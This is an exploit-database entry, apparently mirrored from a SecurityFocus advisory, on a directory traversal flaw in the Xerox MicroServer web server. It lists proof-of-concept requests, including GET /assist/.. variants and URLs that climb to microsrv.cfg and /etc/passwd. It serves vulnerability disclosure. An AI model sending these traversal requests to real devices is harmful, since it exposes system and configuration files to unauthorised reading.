Xerox MicroServer - Web Server Directory Traversal
Author: J.A. Gutierrez type: remote platform: unix port: date_added: 2003-12-19 date_updated: 2012-12-17 verified: 1 codes: tags: aliases: screenshot_url: application_url: raw file: 23449.txt
source: https://www.securityfocus.com/bid/9256/info It has been reported that Xerox_MicroServer/Xerox11 may be prone to a directory traversal vulnerability that may allow an attacker to traverse outside the server root directory by using '/..' or '/.' character sequences at the end of a URL request. GET /assist/.. GET /assist/////.././../../. http://www.example.com////../../data/config/microsrv.cfg http://www.example.com////////../../../../../../etc/passwd